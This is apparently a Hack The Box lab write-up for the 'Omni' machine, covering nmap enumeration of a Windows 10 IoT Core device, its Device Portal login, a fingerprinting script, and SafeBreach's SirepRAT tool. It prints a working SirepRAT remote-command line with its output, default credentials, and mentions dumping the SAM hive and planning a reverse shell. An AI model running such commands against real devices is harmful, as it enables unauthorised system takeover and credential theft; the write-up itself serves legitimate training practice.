Omni HTB

Eswar Abisheak
4 min read · Sep 24, 2020


The only way to learn a new programming language is by writing programs in it.
Dennis Ritchie

What does omni mean?
omni-: all; universally (as in omnidirectional).

kali@kali:~$ sudo nmap 10.10.10.204
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 14:19 EDT
Nmap scan report for 10.10.10.204
Host is up (0.084s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)

Microsoft Windows RPC
MSRPC provides transparent inter-process communication: a client calls a procedure on a remote server as though it were local, without handling the network exchange itself.

Microsoft IIS httpd
This machine is acting as a web server on port 8080/tcp. The HTTP Server header returns ‘Microsoft-HTTPAPI/2.0’. From what I know, that header means the service is built directly on HTTP.sys rather than on IIS. Furthermore, the Basic realm is ‘Windows Device Portal’, so I think this is an IoT (Internet of Things) device: the Windows Device Portal (WDP) lets you configure and manage a device remotely over the local network.

Enumerate Web Server

Let’s first make a connection to this web service and see what happens. I visited http://10.10.10.204 and got an authentication pop-up.

I had no credentials. A Google search for ‘Windows Device Portal’ led me to the Windows Device Portal documentation page, which ties it to Windows 10 IoT Core. Port 8080 is the default WDP port, which means Developer mode (Dev) is enabled by default on this device. The default credentials, Administrator / p@ssw0rd, do not work.
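For asset-inventory purposes, the following added example (not code from the write-up or from SirepRAT) fingerprints an exposed Windows Device Portal from the same headers nmap reported above; the raw 401 response it parses is constructed, and `fingerprint_wdp` is a name chosen here.

```python
"""Fingerprint an exposed Windows Device Portal (WDP) from a raw HTTP response.

Added example for exposure/inventory checks; not part of the original write-up
or of SirepRAT. SAMPLE_RESPONSE is constructed from the headers in the nmap
output (401, Basic realm=Windows Device Portal, Microsoft-HTTPAPI/2.0).
"""
import re
from typing import Dict, Optional

# Constructed sample: what a client sees on the WDP port before authenticating.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 401 Unauthorized\r\n"
    b"Content-Length: 0\r\n"
    b"Server: Microsoft-HTTPAPI/2.0\r\n"
    b"WWW-Authenticate: Basic realm=Windows Device Portal\r\n"
    b"Date: Thu, 24 Sep 2020 18:19:00 GMT\r\n"
    b"\r\n"
)


def parse_headers(raw: bytes) -> Dict[str, str]:
    """Return header names (lower-cased) -> values; the body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def fingerprint_wdp(raw: bytes, port: int) -> Optional[dict]:
    """Classify the service; returns None when it does not look like WDP."""
    status = raw.split(b"\r\n", 1)[0]
    headers = parse_headers(raw)
    auth = headers.get("www-authenticate", "")
    # Realm may be quoted or bare; match both forms case-insensitively.
    m = re.match(r'basic\s+realm="?([^"]*)"?', auth, re.IGNORECASE)
    if not m or "windows device portal" not in m.group(1).lower():
        return None
    return {
        "realm": m.group(1),
        "unauthenticated": status.split()[1:2] == [b"401"],
        "http_sys": headers.get("server", "").startswith("Microsoft-HTTPAPI"),
        # 8080 is the IoT Core WDP default, which the write-up ties to Dev mode.
        "dev_mode_port": port == 8080,
    }
```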

Enumerating Windows IoT Core

With this information, I can start enumerating this Windows 10 IoT Core operating system. I began by searching Google for exploits related to Windows 10 IoT Core and found that security researcher Dor Azouri of SafeBreach had discovered a vulnerability in the Sirep/WPCon communications protocol included with the Windows 10 IoT Core operating system. ZDNet wrote a blog article about it back in March 2019: New exploit lets attackers take control of Windows IoT Core devices.

SirepRAT

SafeBreach-Labs released SirepRAT, a tool that provides Remote Code Execution (RCE) as SYSTEM on Windows 10 IoT Core. I cloned the repository.

Reading the repo closely, I realised I could root this box immediately by dumping the SAM and copying the SYSTEM registry hive, since the RAT executes as SYSTEM. IMO that is not the intended way, so I proceed down the intended path instead.

~$ git clone https://github.com/SafeBreach-Labs/SirepRAT
Password:
Cloning into 'SirepRAT'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 64 (delta 0), reused 0 (delta 0), pack-reused 61
Unpacking objects: 100% (64/64), 5.58 MiB | 1.67 MiB/s, done.

Before I can get this exploit working on my MacBook Pro, I need to install the Python library ‘hexdump’.

~$ easy_install hexdump
Searching for hexdump
Reading https://pypi.org/simple/hexdump/
Downloading https://files.pythonhosted.org/packages/55/b3/279b1d57fa3681725d0db8820405cdcb4e62a9239c205e4ceac4391c78e4/hexdump-3.3.zip#sha256=d781a43b0c16ace3f9366aade73e8ad3a7bd5137d58f0b45ab2d3f54876f20db
Best match: hexdump 3.3
Processing hexdump-3.3.zip
Writing /tmp/easy_install-iaZ7GV/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/easy_install-iaZ7GV/egg-dist-tmp-4m2EP4
zip_safe flag not set; analyzing archive contents...
Copying hexdump-3.3-py2.7.egg to /Library/Python/2.7/site-packages
Adding hexdump 3.3 to easy-install.pth file
Installed /Library/Python/2.7/site-packages/hexdump-3.3-py2.7.egg
Processing dependencies for hexdump
Finished processing dependencies for hexdump

I can now start with SirepRAT. It puts various commands at my disposal. I start by checking which account is currently logged on.

~$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 30, payload peek: 'C:\Data\Users\DefaultAccount'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

The script works, so I have verified that this Windows 10 IoT Core device is vulnerable. The currently logged-on account is ‘DefaultAccount’. The next step is to establish a reverse shell from the device to my machine. Since the script can run arbitrary programs, I can launch PowerShell to set up the reverse shell.


Written by Eswar Abisheak

DSCVIIT lead || https://eswar.dev || HTB player || Competitive Coding
